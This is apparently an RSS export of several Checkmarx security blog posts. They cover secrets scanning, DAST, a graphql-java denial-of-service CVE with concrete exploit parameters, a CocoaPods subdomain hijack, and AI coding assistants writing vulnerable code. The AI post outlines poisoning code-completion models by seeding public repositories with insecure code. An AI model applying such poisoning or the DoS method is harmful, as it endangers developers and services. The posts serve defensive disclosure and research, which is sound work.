Application Security Testing The world runs on code. We secure it. Sun, 07 Jul 2024 08:13:34 +0000 en-US hourly 1 https://wordpress.org/?v=6.6.1 https://checkmarx.com/wp-content/uploads/2024/06/cropped-cx_favicon-32x32.webp Application Security Testing 32 32 Secrets, Secrets Are No Fun. Secrets, Secrets (Stored in Plain Text Files) Hurt Someone  https://checkmarx.com/blog/secrets-secrets-are-no-fun-secrets-secrets-stored-in-plain-text-files-hurt-someone-2/ Thu, 27 Apr 2023 13:00:00 +0000 https://checkmarx.com/?p=85278 Secrets are meant to be hidden or, at the very least, only known to a specific and limited set of individuals (or systems). Otherwise, they aren’t really secrets. In personal life, a secret revealed can damage relationships, lead to social stigma, or, at the very least, be embarrassing. In a developer’s or application security engineer’s professional life, the consequences of exposing secrets can lead to breaches of security, data leaks, and, well, also be embarrassing. And while there are tools available for detecting source code and code repositories, there are few options for identifying secrets in plain text, documents, emails, chat logs, content management systems, and more. 

What Are Secrets? 

In the context of applications, secrets are sensitive information such as passwords, API keys, cryptographic keys, and other confidential data that an application needs to function but should not be exposed to unauthorized users. Secrets are typically stored securely and accessed programmatically by the application when needed. 

The use of secrets is an essential aspect of securing applications. Unauthorized access to these sensitive pieces of information can lead to security breaches and other malicious activities. To protect secrets, developers, system administrators, and security engineers use a variety of security techniques such as encryption, secure storage, and access control mechanisms to ensure that only authorized users can access them. Additionally, they implement best practices such as regularly rotating passwords and keys and limiting the scope of access to secrets to only what is necessary for the application to function. 

Secrets in the Software Supply Chain 

Secrets are a critical component of software supply chain security, which encompasses collaboration to deployment, and everything in between.  

As an example, Confluence is a popular collaboration tool used by many organizations to store and share information and can be a common source of secret leaks. This is because Confluence allows anyone with access to a page to view its contents, including sensitive information like API keys and passwords (see image below). Additionally, users may accidentally expose secrets by copy-pasting them into Confluence pages or by including them in code snippets or in stored configuration files.  

A secret, such as an access key or password, is often the only thing standing between an attacker and sensitive data or systems. Therefore, it’s essential to keep these secrets confidential and secure. When secrets are compromised, it can lead to a devastating data breach, which can cause significant financial and reputational damage to an organization.  

Secrets are a frequent target of software supply chain attacks. Attackers often target secrets to gain access to enterprise systems, data, or servers. They can easily obtain these secrets if they have mistakenly leaked to a public source. Safeguarding secrets in software supply chain security is essential to ensure that attackers cannot exploit them to compromise enterprise systems and data. Proper secret management can help prevent unauthorized access to critical systems and data, protecting organizations from supply chain attacks. 

How Do You Keep Secrets Secret? 

To protect against secrets being leaked, you can employ the following practices: 

  1. Use environment variables to store secrets: instead of hardcoding secrets in your code, store them in environment variables. This makes it easier to manage secrets and ensures that they are not accidentally committed to a code repository. 
  1. Use a .gitignore file: Create a .gitignore file to exclude files that contain secrets from being tracked by Git. This will prevent sensitive information from being accidentally committed to a code repository. If following #1 above, make sure if secrets are stored in an environment variable file, that file is specified in .gitignore. 
  1. Use a secrets management tool: a secrets management tool can help securely store and manage application or system secrets. This ensures that secrets are encrypted and only accessible by authorized users. 
  1. Use encryption: encrypt secrets before storing them in code repositories. This provides an extra layer of security and makes it more difficult for attackers to access sensitive information. 
  1. Use two-factor authentication (2FA): Enable 2FA for code repositories to prevent unauthorized access. This adds an extra layer of security and makes it more difficult for attackers to gain unauthorized access to a code repository. 

By following these best practices, you can protect yourselves from accidentally exposing sensitive information in our code repositories and source control managers. But what about other systems, such as content management systems, plain text documents, emails, chat logs, and other digital assets not stored in a repository? 

Introducing Too Many Secrets by Checkmarx 

Too Many Secrets (2MS) is an open source project dedicated to helping people protect their sensitive information like passwords, credentials, and API keys from appearing in public websites and communication services. 2MS supports Confluence today and we will soon be adding support for Discord. In addition, it’s easily extensible to other communication or collaboration platforms as well. 

Installing and running 2MS is extremely quick and simple. Built in Go, all you need is to clone the repository, build the project, and run the binary against your platform. Below is the list of commands I used to get up and running on OSX (using Bash 5.1.16): 

# brew install go 

# git clone https://github.com/Checkmarx/2ms.git 

# cd 2ms 

# go build 

# ./2ms –confluence https://<MyConfluence>.atlassian.net/wiki –confluence-spaces <MySpace> –confluence-username <MyUsername> –confluence-token <MyToken> 

2MS is built on a secrets detection engine (currently gitleaks) and includes various plugins to interact with popular platforms. This means anyone in the open source community can contribute, improve, and extend 2MS quite easily. 

Learn More 

We believe that by working together, we can create a more secure digital world. To learn more or download the project yourself, head over to the https://github.com/Checkmarx/2ms, available on GitHub. 

]]>
image-10-1024×576-1
Shift EVERYWHERE With Checkmarx One and DAST  https://checkmarx.com/blog/shift-everywhere-with-checkmarx-one-and-dast/ Thu, 27 Apr 2023 13:00:00 +0000 https://checkmarx.com/?p=84099 In the early days of application security, the go-to for every organization looking to secure their applications focused on two types of scanning engines only – SAST to analyze and secure source code and DAST to test against a deployed or running application. 

This approach has changed in today’s AppSec world as there is a need for platform that offers a wide range of scanning engines that fit the multiple domains of modern application development, such as SAST, SCA, Infrastructure as Code, API security, etc. Also, due to the speed and complexity of modern application development, it has become imperative that any scanning engine fits seamlessly into the developer’s pipeline to not interrupt workflows or delay delivery.  

And, admittedly, it is this trend of modern application development that has resulted in some AppSec experts moving away from DAST and other runtime solutions to focus on pre-deployment scanners, such as SAST and SCA. 

However, this trend is about to change again. Not only does Checkmarx One offer all the scanning engines that one would expect (and then some, such as supply chain security, IaC security, and API security), but our approach to DAST is set to bring it back into the mainstream. 

Getting Started with DAST 

Creating Environments and Running a Scan 

Since DAST executes against a running application, we need to create an Environment to define the application to be tested. This is where the environment’s name, URL, and type (web or API) are defined along with optional fields for tags and groups: 

Checkmarx One supports both web and API environment types. API environments have additional fields to upload API documentation files and link the environment to a project. See the API Security Integration section for more details.  

You can initiate a DAST scan either manually via the Checkmarx One portal (which we will cover in this section) or using the DAST CLI, which can be run independently or as a part of a build pipeline. 

After creating the environment, it will be visible in the environments list and is ready to scan: 

Hovering over the environment will reveal an action menu where we can start a scan, review results, and copy the environment ID (needed for pipeline integration). 

Selecting the scan option will open the new scan wizard where a configuration file is provided to define scan settings, user accounts, authentication method, etc.  

After providing the configuration file, we are ready to begin the scan: 

We can then use the View action to dive into the scan results: 

API Security Integration 

As we mentioned above, one of the key synergies in Checkmarx One is the correlation between API Security and DAST, where DAST can leverage the APIs that were discovered by API Security to drive the coverage of the DAST API scan. 

It is easy for users to link a DAST API environment with a Checkmarx One project to automatically consume any API Security results. We simply need to select a project in the project drop-down: 

Viewing Checkmarx One DAST Results 

And finally, let’s look at how to review and triage our DAST results which we can dive into using the environment’s view option: 

Individual findings can be investigated in detail by clicking on the issue itself. Here, on the risk detail page, we can find the more information for this vulnerability, such as its risk score, method, parameters, attack string, etc. as well as a detailed description on the vulnerability type and resolution and remediation advice: 

And most importantly, each DAST vulnerability also includes Evidence that has a quick link to copy the request and attack string to your local clipboard – this allows for easy validation of results: 

Learn more 

To learn more about Checkmarx DAST, you can see it in action here or contact your Checkmarx account team. 

]]>
image image-2-1024×185-1 image-1-1024×62-1 image-3 image-6-1024×58-1 image-4-1024×60-1 image-5 image-8-1024×458-1 image-9-1024×546-1 image-10-1024×434-1 image-7-1024×271-1
It’s Here: The Global Pulse on Application Security Report https://checkmarx.com/blog/its-here-the-global-pulse-on-application-security-report/ Tue, 25 Apr 2023 16:13:37 +0000 https://checkmarx.com/?p=84052 The application security landscape is in a state of constant flux. Tools that were once sufficient for securing your applications may no longer be enough.

To better understand the state of application security, including present and future development trends, we conducted a survey of 1500 plus CISOs, AppSec managers, and developers worldwide with an independent research agency, Censuswide, and reviewed internal data from Checkmarx One™ — our cloud-based application security platform. 

After evaluating the internal and external findings, we were able to identify common tendencies amongst roles and draw conclusions around topics such AppSec scan use, secure code training practices, development practices, budget constraints, and digital transformation efforts.

We hope that you take the time to comb through our second annual ‘Global Pulse on Application Security‘ report, but in the meantime, here’s a small sampling of the findings.

Modern development practices bring modern risks

There’s been an ongoing trend in application security over the past few years: the need for speed. As we saw in this year’s Global Pulse on Application Security report, technological advances and increased connectivity have heightened reliance on software, especially applications. To keep up with consumer demands and remain competitive in the software space, enterprises are prioritizing speed to market through digital transformations and modern development tactics such as increased use of open source libraries, APIs, microservices, and containers.

But new approaches to hosting, building, and deploying applications bring new risks and attack surfaces. In fact, 88% of organizations experienced at least one breach in the past 12 months — most of which were the direct result of modern development practices [shown below in Figure 1 from the report].

Vulnerabilities are found throughout the software development life cycle

A few years ago, “shift left” was the mantra that every development and security team lived by. But is that still the right approach?

Our report uncovered that vulnerabilities are found throughout the software development life cycle (SDLC), not only in the beginning phases.

“60% of vulnerabilities are detected during the code, build, or test phases, and 40% are found during the production phase.”

What does this finding mean? By shifting AppSec testing to the left and only testing at the beginning of the SDLC, you could miss vulnerabilities further down the line, like in production.

Organizations are not satisfied with their current AppSec testing tools and plan to make changes

The secret is out: 98% of software developers are not satisfied with their security testing tools. The survey revealed that the most common complaints around testing tools include “way too many false positives,” and “no correlation of scan results,” among others.

It also doesn’t help that most AppSec testing tools do not easily integrate and automate in developer’s existing tools and processes.

“Only 34% of developers responded that their AppSec scans are completely integrated and automated into their SCMs, IDEs, and CI/ CD tooling.”

With discontent around testing tools from developers, it comes as no surprise that 99% of AppSec managers plan to add new testing solutions or strategies over the next 12 months.

Responses show a need for an AppSec platform in order to ‘shift everywhere’

From the findings, it’s safe to surmise that organizations developing modern software need to take a step back and look holistically at their application security. For starters, application security needs to be embedded into every phase of the SDLC, not just at the beginning. In other words, organizations should not only shift left but also shift right, a concept referred to as “shifting everywhere.”

By shifting AppSec everywhere, organizations can find and fix vulnerabilities faster, significantly reducing time to market and lowering costly rework to remediate vulnerabilities. This helps ensure that new technologies and architectures are secure.

The findings in this year’s ‘Global Pulse on Application Security’ report also point to the importance of a cloud-based platform approach. By having all of your AppSec testing tools with one vendor on a unified platform, development teams can seamlessly integrate scans into their CI/CD pipelines and defect-tracking systems, creating better automation and a more efficient feedback loop. Empowering developers to be in the driver’s seat with AppSec initiatives not only helps foster a stronger relationship between development and security teams but also frees up the security team to concentrate on product security.

One unified AppSec platform, like Checkmarx One™ , can also help organizations to prioritize vulnerabilities. Checkmarx One offers unique scan correlation capabilities that provide actionable insights into vulnerabilities across scan types and applications so you know what fixes will make the greatest impact in the shortest period of time. And given that Checkmarx One offers testing tools to reduce risk across all components of modern software — including proprietary code, open source, APIs, and Infrastructure as Code — there’s no need to juggle multiple AppSec vendors.

Ready to dig deeper?

We hope you’ll explore the ‘Global Pulse on Application Security’ report to learn additional insights from your industry peers and to inform the decisions you make about your own AppSec program.

Get the full report.

]]>
figure-1-1024×511-1 SDLC-2 tools-2 testing-2
3 Financial Services Trends and How They Affect Your Application Security https://checkmarx.com/blog/3-financial-services-trends-and-how-they-affect-your-application-security/ Mon, 24 Apr 2023 22:22:51 +0000 https://checkmarx.com/?p=83998 Learn how Checkmarx and AWS have partnered to help your financial services firm adapt to the evolving landscape

The way we bank has changed beyond recognition. Where transactions once took place in person within the walls of impressive buildings, we now see mobile and online banking on the rise. Anywhere, anytime, palm-of-your-hand banking is the norm, and our expectations are shaped by the seamless, personalized app experiences that have become the default in the digital universe. At the same time, the global acceleration of digital banking licenses has created a new competitive landscape populated by fast-moving market entrants and born-in-the-cloud providers.

One thing that hasn’t changed, though, is the position of trust at the cornerstone of the banking system. Indeed, in today’s volatile economic and cybersecurity environment, building brand trust is more important than ever. Whether you are a legacy brand or a new market entrant, any lack of trust compromises your ability to succeed.

So financial services firms face a continuing challenge: how to innovate at the speed required without compromising customer safety and system security? Most are turning to the cloud for answers. Its flexibility and scalability are making it central to financial service organizations’ efforts to embrace new trends and deliver innovative services at pace.

AWS has some intriguing solutions to meet the challenge. The cloud leader provides a full suite of services to help banks achieve the agility to thrive in the digital age, while certified partners such as Checkmarx ensure the security of the applications and services banks develop.

Recently, the team at AWS identified seven key trends that are impacting the financial services industry. Here we take a deep dive into three areas where AppSec is highly relevant and explore what they mean for the sector.

Trend 1: Customer experience — speed and security must be dual priorities

Today, the economic power is passing to a digital-native generation with little loyalty to legacy banking brands and great expectations of how personal and business financial services should perform. This means customer experience is the modern commercial battleground. Banking must be hyper-personalized and service-led. Increasingly, banking is integrated into consumers’ day-to-day journeys through embedded financial services within trusted brands such as Starbucks and Uber.

Banks are leaning heavily on AI and machine learning to predict customer needs through analysis of internal and external datasets, while the omnichannel drive continues through solutions such as authentication based on voice recognition, real-time sentiment analysis of customer service calls, chatbot support, and automated self-service options.

AWS supports these initiatives and many more through cloud-powered big data analysis that allows banks to leverage AI and machine learning on a massive scale. It also, in its own words, “helps compress time to innovation and, ultimately, time to value, by facilitating rapid development, testing, and deployment to produce new ideas and customer propositions.”  

AWS allows banks to accelerate innovation through its cloud-native application development services, but they also need to ensure the code they create is secure and resilient. Achieving application security assurance without putting a brake on delivery speed is crucial. However, a recent Checkmarx survey of banking and insurance CISOs found that 84% of respondents undergoing digital transformation and implementing a cloud-native strategy were concerned about secure application development and deployment.

As an AWS accredited partner, Checkmarx understands that security must work at the speed of DevOps. The Checkmarx One™ Application Security Platform is designed for the cloud development generation and delivered from the cloud, bringing integrated one-click AppSec testing that allows financial services companies to deploy more secure code — fast.

Trend 2: Ecosystem-based banking and banking-as-a-service APIs take center stage

The open banking era is unlocking the doors to greater innovation and collaboration. Providers can now seize new opportunities to develop products that blur the boundaries between different types of financial services. They are establishing solutions that offer their banking services, including fully managed banking propositions, to third parties securely via microservices and a common platform.

AWS identifies two key approaches to this trend. The “marketplace” approach sees banks providing “value-added and contextualized services to their customers such as ERP integrations or personal finance management.” The aim is to deepen the relationship with individual and business customers beyond basic service provision.

The “banking-as-a-service” approach sees banks offering a range of services — from standalone specific regulatory-driven services like Know Your Customer’s Customer (KYCC) to fully managed offerings that let any organization set up a branded banking service.

Center-stage in both approaches are the bank’s APIs, designed to allow banking products and services to be distributed to customers and third parties. Modernizing API architecture in the cloud accelerates the development and testing of APIs, making them easier to integrate as well as providing scalability.

Checkmarx API security offers banks and their customers and partners a crucial service that helps discover, control, and mitigate API security risk. It offers complete visibility into your API inventory and identifies vulnerabilities and misconfigurations. Controlling API risk is an essential component of developing financial marketplace ecosystems and banking-as-a-service solutions.

Trend 3: Cyber event recovery reducing the attack surface and responding to regulatory requirements

Given its nature, it is not surprising that the financial services sector faces more cyberattacks than any other. On top of these external incursions comes the disruption of digital transformation, which can also create vulnerabilities including third-party and supply chain risk.

Banks are investing in a range of measures designed to manage and mitigate risk and accelerate recovery from any attack. Reducing the attack surface and minimizing vulnerabilities is an essential activity if the sector is to safeguard its reputation and maintain customer trust. Additionally, the growing library of regulations designed to ensure banks are meeting their security obligations means they need to adopt solutions that support compliance.

AWS offers a wealth of solutions to ensure client data is protected and banks can recover quickly from attacks. These include Amazon Simple Storage Service (Amazon S3), key management services, software-defined firewalls that facilitate network isolation, and geographic sovereignty solutions that meet compliance requirements.

These and many other offerings take care of Amazon’s part of the shared security bargain, however, banks are also responsible for securing the workloads they deploy in AWS. This is where Checkmarx steps in, providing comprehensive AppSec solutions that integrate seamlessly with AWS SDLC tools to secure the entire process. Checkmarx addresses all types of application risk, from custom code errors to open source component vulnerabilities, API risks, and infrastructure as code misconfigurations.

These are dynamic times for financial services firms, and AWS with Checkmarx are helping them capitalize on opportunities while defending against threats — both malicious and competitive.

Interested in learning more?

We’re exploring these trends in detail in our webinar on May 4, 2023, where AWS and Checkmarx will explain how you can turn AppSec into a competitive advantage as you continue your cloud transformation journey.

REGISTER FOR THE WEBINAR

]]>
CVE-2022-37734: graphql-java Denial-of-Service https://checkmarx.com/blog/cve-2022-37734-graphql-java-denial-of-service/ Thu, 30 Mar 2023 12:49:09 +0000 https://checkmarx.com/?p=82099 GraphQL is an API standard said to be a more efficient and flexible alternative to REST and SOAP. One of the main purposes of a GraphQL server is to process incoming data.

One of the most challenging tasks for developers who work with GraphQL servers is Denial-of-Service (DoS) protection. Directive overloading (submitting multiple directives) is one of the DoS vectors to be concerned about.

Directives are used to dynamically change queries’ structure and shape using variables. If the context of using the directive is not clear – don’t worry; that’s not important in the current vulnerability. To learn more information about directives and directive overloading check our blog post: https://checkmarx.com/blog/alias-and-directive-overloading-in-graphql/

Vulnerable software

graphql-java is the most popular GraphQL server written in Java. It was found to be vulnerable to DoS attacks through the directive overload.

Moreover, the spring-graphql by Spring and dgs-framework by Netflix libraries use it as a core component. Therefore, they’re also vulnerable if the core component is outdated. To understand the scale of the problem, it’s worth mentioning that graphql-java is the number 1 library in Maven’s top GraphQL servers and is used by 355 libraries.

The vulnerability was fixed in two stages. The first fix introduced a security control, whereas the second one targeted the root cause. The first fix is presented in the versions of graphql-java 19.0 and later, 18.3, and 17.4.

The second fix has been applied in the version 20.1 with the pull-request.

Exploitation and Impact

The vulnerability can be exploited by sending a crafted GraphQL request. The request contains a huge number of non-existing directives.

The example demonstrated below is based on the spring-graphql GraphQL server that uses the unpatched graphql-java version.

Request example:

@aa is a non-existent directive. The processing time of this request is only about 100 ms; whereas, adding a large number of directives drastically increases the execution time. The screenshot below shows the request with 1000 directives which is executed in 189 ms, 3000 in 447 ms, 5000 in 963 ms, 7000 in 1,7 second, 10000 in 3 seconds, and 15000 in 5.4 seconds:

The time of execution increases based on the number of directives. By launching 50 concurrent malicious requests with 30.000 directives, the server becomes unavailable:

As a result of this attack, the server became unavailable. All the CPU resources were exhausted.

An attacker can exhaust all the server’s CPU resources by sending 50 concurrent requests using only one attacking machine.

Root cause

Two Denial-of-Service protections have been added before the discovery of the vulnerability in the following pull requests:

These protection mechanisms are triggered when an attacker submits a big query; they limit the number of parsed tokens and validation errors.

And the limit works. After submitting more than 15000 tokens, the following error occurs:

{
  "errors": [
    {
      "message": "Invalid Syntax : More than 15000 parse tokens have been presented.
      To prevent Denial Of Service attacks, parsing has been cancelled. offending token '@' at line 2 column 22511"
    }
  ],
  ...
}

However, as seen in the example above, the execution time increases even when more than 15000 tokens are provided. It means that the DoS occurs before the code reaches the token limits.

The problem resides in query recognition by the ANTLR4 lexer. The graphql-java developer bbakerman mentions:

Testing showed that the max token code was indeed being hit, but the ANTLR lexing and parsing code was taking proportionally longer to get to the max token state as the input size increased

This is cause by the greedy nature of the ANTLR Lexer – it will look ahead and store tokens in memory under certain grammar conditions..

Graphql-java uses ANTLR4 for decomposing GraphQL queries to lexical tokens. The code line that raises the DoS vulnerability is located in the file graphql/parser/Parser.java:

The call chain goes to the file graphql/parser/antlr/GraphqlParser.java.

This file is generated automatically by ANTLR and is based on the grammar file Graphql.g4. The file with the .g4 extension contains the grammar for the ANTLR parser. The file imports other g4 files, and they all describe how ANTLR should parse GraphQL queries.

Further investigation of ANTRL files revealed the vulnerable pattern. The pattern causing the DoS vulnerability in GraphQL grammar is a classic “don’t.” The following rule is located in the GraphqlSDL.g4 file:

...
schemaExtension :
    EXTEND SCHEMA directives? '{' operationTypeDefinition+ '}' |
    EXTEND SCHEMA directives+
;

And the directives rule isdescribed in the file GraphqlCommon.g4:

 directives : directive+;
directive :'@' name arguments?;

The rule called directives is repetitive and, additionally, applies repetition to the directive sub-rule. Nested repetition leads to DoS risk. This issue can be compared with an “evil” regex.

It’s worth mentioning that the schemaExtension rule is not even used to recognize the query. It happens because the directives rule uses the adaptivePredict method in the ANTLR-generated code.

adaptivePredict algorithm is context-free by default – but, in case of ambiguity, it falls back to a context-sensitive analysis to proceed with the recognition. This seems especially relevant when a rule has a repetition operator since ANTLR can only decide which state to transit to after looking ahead until the end of the repetition. This lookup wouldn’t be a problem for a single repetition since ANTLR only performs this analysis once per loop. However, the code contains nested repetition, which causes ambiguity inside both repetitions.

Fix #1

The diff for fixed code: https://github.com/graphql-java/graphql-java/pull/2892/files#diff-f9fc01d56c3bffa9c70fee9c9b3ad888d6890b84d774c20a99b2526b31500ab8

The idea behind the fix is the same as the DoS protection just mentioned—stop parsing query if it contains more than 15,000 (a default configurable value) directives. This time, the check is performed before passing the query to ANTLR processing.

The main changes in the graphql/parser/Parser.java file:

SafeTokenSource class is introduced to verify that the number of tokens in the query doesn’t exceed a threshold. It prevents a malicious query from being stuck by throwing an exception when a threshold is reached.

Additional research of the fixed version showed that the fix protects graphql-java server only against a single-threaded attack. An attacker cannot send a single query with a large amount of “evil” directives; however, sending multiple requests simultaneously (> 50-100 threads) containing a large, but allowed number, if directives still leads to DoS, since the root cause of the vulnerability was still there.

Fix #2

The second fix targets the root cause. These changes fix the nested repetition of directives in the rule schemaExtension.

This is the changed code in the file src/main/antlr/GraphqlSDL.g4:

For fixing the nested repetition, it’s enough to delete the + (plus) sign for the directives. Also, it requires changing the parsing of the schema in the file src/main/java/graphql/parser/GraphqlAntlrToLanguage.java.

After applying the fix, a significant difference in execution time between the first and the second fixes can be observed:

The utilized payload @aa is two characters long. As shown in the screenshot above, 7000 directives, two chars long each, do not hit the 15000 chars limit and consume way more resources when the second fix is not applied. The execution time becomes similar after 8000 directives because the first fix blocks more than 15000 characters and doesn’t parse them. The second fix eradicates the root cause and prevents a DoS regardless of the payload size.

The changes above were applied in the pull-request: https://github.com/graphql-java/graphql-java/pull/3071

References

]]>
From Zero to AppSec Anti-Hero: How AI Brings More Security Issues Than It Fixes https://checkmarx.com/blog/from-zero-to-appsec-anti-hero-how-ai-brings-more-security-issues-than-it-fixes/ Fri, 17 Mar 2023 07:00:00 +0000 https://checkmarx.com/?p=82016 AI is now being pushed, if not forced, into software development by “helping” developers writing code. With this push, it’s expected that developers’ productivity increases, as well as the speed of delivery. But are we doing it right? Did we not, in the past, also push other tools/methodologies into development to increase the speed of development? For example, the Waterfall Model was not very flexibly when came to security. [1] That push created more security issues than the actual ones that were solved, because security is always the last thing to think of. We can see the same pattern all over again with AI used to develop software.

Code Completion Assistants

Tabnine, GitHub Copilot, Amazon CodeWhisperer, and other AI assistants are starting to be integrated into developers coding environments to help and increase their speed of writing code. GitHub Copilot, described as your “AI pair programmer”, is a language model trained over open-source GitHub code. The data in which it was trained on, open-source code, usually contains bugs that can develop into vulnerabilities. And given this vast quantity of unvetted code, it is certain that Copilot has learned from exploitable code. That is the conclusion that some researchers reached, and according to their paper that created different scenarios based on a subset of MITRE’s CWEs, 40% of the code generated by Copilot was vulnerable.[2]

Figure 1- Creating a profile page with PHP

In the GitHub Copilot FAQ, it stated that “you should always use GitHub Copilot together with good testing and code review practices and security tools, as well as your own judgment.” Tabine makes no such statement but CodeWhisperer states that it “empowers developers to responsibly use artificial intelligence (AI) to create syntactically correct and secure applications.” It is a bold statement that in reality is not true. I tested the CodeWhisperer in the Python Lambda function console, and the results were not promising. Figure 2 is an example of CodeWhisperer generating code for a simple Lambda function that reads and returns a file contents. The issue in the code is that it is vulnerable to Path Traversal attacks.

Figure 2- Creating a Lambda Function to read and return a file content

Taking a step back, these AI assistants need data to be trained on, and they need to understand the context in which the code is being inserted on. The data that is used to train the models, in most cases it’s open-source code, which as was stated before, and most of the time, contains vulnerable code. Figure 3,  Figure 4, and Figure 5 represent some examples of public repositories with vulnerabilities that were already found but no fix was applied. In addition, there is another factor that we need to take into consideration—supply chain attacks. What happens if attackers can compromise the model? Are these assistants also vulnerable to attacks? Theoretically, by creating a significant number of repositories with vulnerable code, a malicious actor may be able to taint the model into suggesting vulnerable code, since “GitHub Copilot is trained on all languages that appear in public repositories.”

Figure 3 – Four vulnerability issues in yf-exam repo
Figure 4 – Path Traversal in Dice repo
Figure 5 – Unsafe deserialization in Serving repo

In the “You Autocomplete Me: Poisoning Vulnerabilities in Neural Code Completion” paper, researchers demonstrated that natural-language models are vulnerable to model and data poisoning attacks. These attacks “trick the model into confidently suggesting insecure choices in security-critical contexts.” The researchers also present a new class of “targeted poisoning attacks” to affect certain code completion model users.[3]

These attacks, combined with supply chain attacks, may enable malicious actors to devise a set of targeted attacks to affect the models into suggesting vulnerable contexts. And these contexts do not need to be an SQLi, they can be subtle code logic that may enable authentication/authorization bypasses for example.

The elephant in the room, ChatGPT

ChatGPT is the chatbot that everyone is talking about and is considered to be the “next big thing” by a large amount of people. It uses a model trained with Reinforcement Learning from Human Feedback (RLHF) – “human AI trainers provided conversations in which they played both sides—the user and an AI assistant.” [4] According to a Forbes article, “On the topic of ChatGPT3, he [Yann] essentially said that ChatGPT is ‘not particularly innovative,’ and ‘nothing revolutionary’. Yes, it will provide information that over time as it will be incredibly accurate as it will be cleansed more, misinformation will be extracted, but it will never have any common sense in being able to look ahead and easily recognize multiple sensory patterns.“[5]

Nonetheless, the chatbot rocked the tech world with its ability to produce code by only asking for it, solve certification exams, or provide insights on security topics. It generated a state of panic everywhere, but should we really be worried? We should be worried, not because of its abilities, but more of its inabilities. ChatGPT is able to write code, but not secure code. I asked the bot to generate a simple application in three different languages and analyzed the results.

The Old School Language

Although the C language is not as popular as other languages, it still is the language that allows developers to create anything. It only takes some patience and time. So why not start looking for examples in the C language? For example, I asked the chatbot to create a simple C application that reads an input from the console and prints it.

While the code generated is pretty simple, the code it generated is vulnerable to a buffer overflow in the scanf. In the scanf documentation, “the input string stops at white space or at the maximum field width, whichever occurs first.” Since there is no maximum defined, it will read until it finds a white space.

Maybe if we ask ChatGPT if the code is vulnerable, it is able to spot the buffer overflow?

It does recognize that the scanf is vulnerable to a buffer overflow, but what if we ask it if the code is vulnerable to string format attacks?

Using the same C code that it was generated, ChatGPT answers with confidence that the code is vulnerable. A total miss, the code is not vulnerable to string format attacks. It looks like the bot is trying to agree with us, and only after telling it that the printf has the %s format specified, the bot admits the mistake.

The Hip Language

What about code in the language that everyone knows about and there is a lot of content about it, Python? I asked it to create a Flask app that provides the ability to upload and download files.

The code looks correct, and it runs, but in the upload endpoint, there is a Path Traversal vulnerability. The debug is also on, and an insecure configuration that we can consider as normal is evident since the app is in the “initial stages”, but ChatGPT does not warn about the potential dangers of leaving it on.

And is the bot able to spot the vulnerability and the security misconfiguration?

Now it does warn about the debug, and then it says that there is a vulnerability about the contents of the files. Although it is true that it is dangerous, it cannot be considered as a vulnerability, since it is a weakness in the code. It would be a vulnerability if the file was processed.

Nonetheless, it completely missed the Path Traversal, probably because the path.join looks secure, but it is not.

The Disliked Language

Maybe, generating safe code for the language that was, and probably still is, the backbone of the Internet will be easier. Maybe?

I asked ChatGPT to create a PHP app that logs in a user against a database and redirects to a profile page.

To no surprise, it also generates vulnerable code. There is a SQL injection and XSS vulnerabilities in the PHP code. Instead of asking if the generated code was vulnerable, I asked if the first piece of code is vulnerable to Server Side Template Injection (SSTI).

For some reason, ChatGPT answers that the code is indeed vulnerable to SSTI. Why is that? The answer explains in detail the SQL injection vulnerabilities, but confuses it with SSTI. From my perspective, and without knowing the full details of the model, I assume that it was taught the wrong information, or by itself inferred incorrect information. So, it is possible to train the ChatGPT model with incorrect information, and since we can construct a thread and feed it knowledge, what happens if a significant number of people feed it with malicious content?

Final thoughts

A New Yorker article describes ChatGPT as a “Blurry JPEG of the Web” [6], which for me is a spot-on description. These models do not hold all the information about a specific programming language or most of the time cannot insert something in a context. And for that reason, even if the code looks correct or does not present any “visible” vulnerabilities, does not mean that when inserted in a specific context, it will not create a vulnerable path.

We cannot deny that this technology represents a huge advancement, but it still has flaws. AI is developed and trained by humans, as such is it not a loophole where we are feeding the models with human mistakes or malicious content? And with the increase in supply chain attacks and misinformation, the information that is used to train the models may be tainted.

When it comes to generating or analyzing code, I would not trust them to be correct. Sometimes it does work but it is not 100% accurate. Some of the assistants mention possible limitations, however these limitations cannot be quantified. Source code analysis solutions that use GPT-3 model are appearing, https://hacker-ai.online/, but they too share the same limitations/problems that ChatGPT has.

AI assistants are not perfect, and it is still necessary to have code review activities and AppSec tools (SAST, SCA, etc.) to help increase the application’s security. Developers should be aware of that and not lose their critical thinking. Copy-paste everything that the assistants generate can still bring security problems. AI in coding is not a panacea.

References

[1] https://securityintelligence.com/from-waterfall-to-secdevops-the-evolution-of-security-philosophy/

[2] https://arxiv.org/pdf/2108.09293.pdf

[3] https://arxiv.org/pdf/2007.02220.pdf

[4] https://openai.com/blog/chatgpt/

[5] https://www.forbes.com/sites/cindygordon/2023/01/27/why-yann-lecun-is-an-ai-godfather-and-why-chatgpt3-is-not-revolutionary/?sh=32a235087a64

[6] https://www.newyorker.com/tech/annals-of-technology/chatgpt-is-a-blurry-jpeg-of-the-web

]]>
CocoaPods Subdomain Hijacked: This is How https://checkmarx.com/blog/cocoapods-subdomain-hijacked-this-is-how/ Thu, 02 Mar 2023 15:00:00 +0000 https://checkmarx.com/?p=81937 CocoaPods is THE dependency manager for iOS and Mac projects. It helps software developers easily add pre-made pieces of code (called “libraries” or “dependencies”) to their iOS or Mac projects. These code libraries can help developers add extra features or functionality to their apps without having to write all of the code themselves. Think of it like adding pre-made Lego pieces to a Lego creation to make it better or more interesting.

Subdomain Hijacking

Subdomain hijacking is a type of cyber attack where an attacker takes control of a subdomain of a legitimate domain, and uses it to host malicious content or launch further attacks.

In a subdomain hijacking attack, the attacker can find forgotten settings on free hosting websites such as GitHub Pages, which are not mapped anymore. The weak validation grants attackers permission to use those subdomains.

CocoaPods Casino

Guy Nachshon, a brilliant security researcher in my team, found out the subdomain cdn2.cocoapods.org was used years ago and abandoned. However, the DNS records still pointed to the GitHub Pages hosting service, and attackers hijacked it to host a fishy casino website.

While we were investigating this, the subdomain got freed on GitHub Pages (probably due to an update/mistake of the attackers).

We jumped on the opportunity and created a simple repository to hold this subdomain and prevent another takeover by those casino attackers.

This works as long as the subdomain is unoccupied by another GitHub Pages project and is super simple to set up -> settings, enable GitHub Pages, type the subdomain “cdn2.cocoapods.org”:

Watch this short demo video to see it in action:

Impact

Generally speaking, the impact of hijacking a subdomain of a known website can trick users into thinking the content they are seeing is legitimate and created by the known brand.

Furthermore, organizations usually allow network traffic to such dev-related legitimate resources from sensitive networks to support the engineering process.

Last year, we saw cases in which attackers hosted malicious exe file on GitHub and another example where an image hosted on imgur.com contained malicious python code. Hence, it’s quite clear what’s the potential of hijacking a subdomain of a popular and legitimate brand.

Conclusion

